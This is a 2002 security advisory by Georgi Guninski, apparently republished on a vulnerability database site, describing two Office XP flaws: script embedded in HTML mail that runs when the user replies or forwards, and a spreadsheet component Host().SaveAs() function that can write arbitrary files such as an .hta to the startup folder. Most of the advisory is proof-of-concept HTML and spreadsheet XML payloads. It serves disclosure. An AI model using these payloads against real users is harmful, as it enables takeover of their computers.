Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

guninski-53.txt

🗓️ 02 Apr 2002 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

Office XP has vulnerabilities allowing script embedding in emails and potential file creation exploits.

Code
` Georgi Guninski security advisory #53, 2002  
More Office XP problems  
Systems affected:  
Office XP  
Risk: High  
Date: 31 March 2002  
Legal Notice:  
This Advisory is Copyright (c) 2002 Georgi Guninski.  
You may distribute it unmodified.  
You may not modify it and distribute it or distribute parts  
of it without the author's written permission.  
If you want to link to this content use the URL:  
http://www.guninski.com/m$oxp-2.html   
Disclaimer:  
The information in this advisory is believed to be true though  
it may be false.  
The opinions expressed in this advisory and program are my own and  
not of any company. The usual standard disclaimer applies,  
especially the fact that Georgi Guninski is not liable for any damages  
caused by direct or indirect use of the information or functionality  
provided by this advisory or program. Georgi Guninski bears no  
responsibility for content or misuse of this advisory or program or  
any derivatives thereof.  
Description:  
Actually there are at least two vulnerabilities in Office XP.  
1. It is possible to embed active content (object + script) in HTML mail  
which is triggered if the user chooses reply or forward to the mail.  
This opens an exploit scenario for forcing the user to visit a page  
in the internet zone of IE at least. For another exploit scenario  
check (2)  
2. There is a bug in ms spreadsheet compononent. Namely in its Host()  
function which may be exploited with the help of (1) or probably from  
any document opened with Office application. This buggy function  
allows creating files with arbitrary names and their content may be  
specified to some extent at which is sufficient to place an  
executable file (.hta) in user's startup directory which may lead to  
taking full control over user's computer.  
This probably may be called cross application scripting because  
one application uses object from another application.  
Details:  
The following must be put in HTML email which should be opened with  
Outlook XP and the user should choose reply or forward.  
1.  
--------------------------------------  
<OBJECT id=WebBrowser1 height=150 width=300  
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>  
<PARAM NAME="ExtentX" VALUE="7938">  
<PARAM NAME="ExtentY" VALUE="3969">  
<PARAM NAME="ViewMode" VALUE="0">  
<PARAM NAME="Offline" VALUE="0">  
<PARAM NAME="Silent" VALUE="0">  
<PARAM NAME="RegisterAsBrowser" VALUE="1">  
<PARAM NAME="RegisterAsDropTarget" VALUE="1">  
<PARAM NAME="AutoArrange" VALUE="0">  
<PARAM NAME="NoClientEdge" VALUE="0">  
<PARAM NAME="AlignLeft" VALUE="0">  
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">  
<PARAM NAME="Location" VALUE="about:/dev/random<script>while (42)  
alert('HOHOHO\nTrying to sell trustworthy  
computing\nHOHOHO')</script>">  
<PARAM NAME="ReadyState" VALUE="4">  
</OBJECT>  
-------------------------------------  
2.  
The office spreadsheet component is something like mini excel.  
It may be embeded in web pages (seems not exploitable) and in  
office documents (seems exploitable).  
It supports the Host() function which returns the hosting object.  
So if you put in formula '=Host().SaveAs("name")' file with name  
shall be created.  
[Note, lines may be wrapped]  
---------------------------------------  
<h1>  
Hehe. Triyng to sell trustworthy computing.  
</h1>  
<object  
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1  
v:shapes="_x0000_s1026" class=shape width=81 height=81  
u1:shapes="_x0000_s1025">  
<param name=DataType value=XMLURL>  
<param name=XMLData  
value="<?xml version="1.0"?>   
<ss:Workbook  
xmlns:o="urn:schemas-microsoft-com:office:office"   
  
xmlns:x="urn:schemas-microsoft-com:office:excel"   
  
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" &#  
10;  
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet&quo  
t;   
  
xmlns:html="http://www.w3.org/TR/REC-html40">   
  
<x:ExcelWorkbook>   
  
<x:ProtectStructure>False</x:ProtectStructure>   
  
<x:ActiveSheet>0</x:ActiveSheet>   
  
</x:ExcelWorkbook>   
<ss:Styles>   
  
<ss:Style ss:ID="Default">   
<ss:Alignment  
ss:Horizontal="Automatic" ss:Rotate="0.0"  
ss:Vertical="Bottom"   
  
ss:ReadingOrder="Context"/>   
  
<ss:Borders>   
</ss:Borders>   
  
<ss:Font ss:FontName="Arial" ss:Size="10"  
ss:Color="Automatic" ss:Bold="0"   
  
ss:Italic="0" ss:Underline="None"/>   
  
<ss:Interior ss:Color="Automatic"  
ss:Pattern="None"/>   
<ss:NumberFormat  
ss:Format="General"/>   
<ss:Protection  
ss:Protected="1"/>   
</ss:Style>   
  
</ss:Styles>   
<c:ComponentOptions>   
  
<c:Label>   
<c:Caption>Microsoft Office  
Spreadsheet</c:Caption>   
</c:Label>   
  
<c:PreventPropBrowser/>   
  
<c:MaxHeight>80%</c:MaxHeight>   
  
<c:MaxWidth>80%</c:MaxWidth>   
  
<c:NextSheetNumber>1</c:NextSheetNumber>   
  
</c:ComponentOptions>   
  
<x:WorkbookOptions>   
  
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>   
  
<x:DisableUndo/>   
</x:WorkbookOptions>   
  
<ss:Worksheet ss:Name="Sheet1">   
  
<x:WorksheetOptions>   
<x:Selected/>   
  
<x:ViewableRange>R1:R262144</x:ViewableRange>   
  
<x:Selection>R1C1</x:Selection>   
  
<x:TopRowVisible>0</x:TopRowVisible>   
  
<x:LeftColumnVisible>0</x:LeftColumnVisible>   
  
<x:ProtectContents>False</x:ProtectContents>   
  
</x:WorksheetOptions>   
  
<c:WorksheetOptions>   
  
</c:WorksheetOptions>   
<ss:Table  
ss:ExpandedColumnCount="1"  
ss:ExpandedRowCount="1"   
  
ss:DefaultColumnWidth="48.0"  
ss:DefaultRowHeight="12.75">   
  
<ss:Row>   
<ss:Cell  
ss:Formula='=HOST().SaveAs("C:\GGGG5")'>   
  
<ss:Data  
ss:Type="Boolean">1</ss:Data>   
  
</ss:Cell>   
</ss:Row>   
  
</ss:Table>   
</ss:Worksheet>   
  
<ss:Worksheet ss:Name="Sheet2">   
  
<x:WorksheetOptions>   
  
<x:ViewableRange>R1:R262144</x:ViewableRange>   
  
<x:Selection>R1C1</x:Selection>   
  
<x:TopRowVisible>0</x:TopRowVisible>   
  
<x:LeftColumnVisible>0</x:LeftColumnVisible>   
  
<x:ProtectContents>False</x:ProtectContents>   
  
</x:WorksheetOptions>   
  
<c:WorksheetOptions>   
  
</c:WorksheetOptions>   
</ss:Worksheet>   
  
<ss:Worksheet ss:Name="Sheet3">   
  
<x:WorksheetOptions>   
  
<x:ViewableRange>R1:R262144</x:ViewableRange>   
  
<x:Selection>R1C1</x:Selection>   
  
<x:TopRowVisible>0</x:TopRowVisible>   
  
<x:LeftColumnVisible>0</x:LeftColumnVisible>   
  
<x:ProtectContents>False</x:ProtectContents>   
  
</x:WorksheetOptions>   
  
<c:WorksheetOptions>   
  
</c:WorksheetOptions>   
</ss:Worksheet>   
  
<o:DocumentProperties>   
  
<o:Author>ad</o:Author>   
  
<o:LastAuthor>ad</o:LastAuthor>   
  
<o:Created>2002-03-17T12:07:37Z</o:Created>   
  
<o:Company>g</o:Company>   
  
<o:Version>10.2625</o:Version>   
  
</o:DocumentProperties>   
  
<o:OfficeDocumentSettings>   
  
<o:DownloadComponents/>   
<o:LocationOfComponents  
HRef="file:///E:\"/>   
  
</o:OfficeDocumentSettings>   
</ss:Workbook> &#10  
;">  
<param name=AllowPropertyToolbox value=0>  
<param name=AutoFit value=0>  
<param name=Calculation value=-4105>  
<param name=Caption value="Microsoft Office Spreadsheet">  
<param name=DisplayColumnHeadings value=-1>  
<param name=DisplayGridlines value=-1>  
<param name=DisplayHorizontalScrollBar value=-1>  
<param name=DisplayOfficeLogo value=-1>  
<param name=DisplayPropertyToolbox value=0>  
<param name=DisplayRowHeadings value=-1>  
<param name=DisplayTitleBar value=0>  
<param name=DisplayToolbar value=-1>  
<param name=DisplayVerticalScrollBar value=-1>  
<param name=DisplayWorkbookTabs value=-1>  
<param name=EnableEvents value=-1>  
<param name=MaxHeight value="80%">  
<param name=MaxWidth value="80%">  
<param name=MoveAfterReturn value=-1>  
<param name=MoveAfterReturnDirection value=-4121>  
<param name=RightToLeft value=0>  
<param name=ScreenUpdating value=-1>  
<param name=EnableUndo value=0>  
</object>  
---------------------------------  
Workaround/Solution:  
The solution is to get a real mail client and office applications.  
Workaround for this particular problem is:  
For (1) - disable everything that contains "active" in IE.  
For (2) - (Have not tested it personally)  
Deregister and delete the ms office spreadsheet component  
Vendor status:  
Microsoft was notified on 17 March 2002.  
They had 2 weeks to produce a patch but didn't.  
Regards,  
Georgi Guninski  
http://www.guninski.com  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Apr 2002 00:00Current
7.4High risk
Vulners AI Score7.4
office xp issueshigh risk vulnerabilitieshtml email exploitsscript embedding risk.
32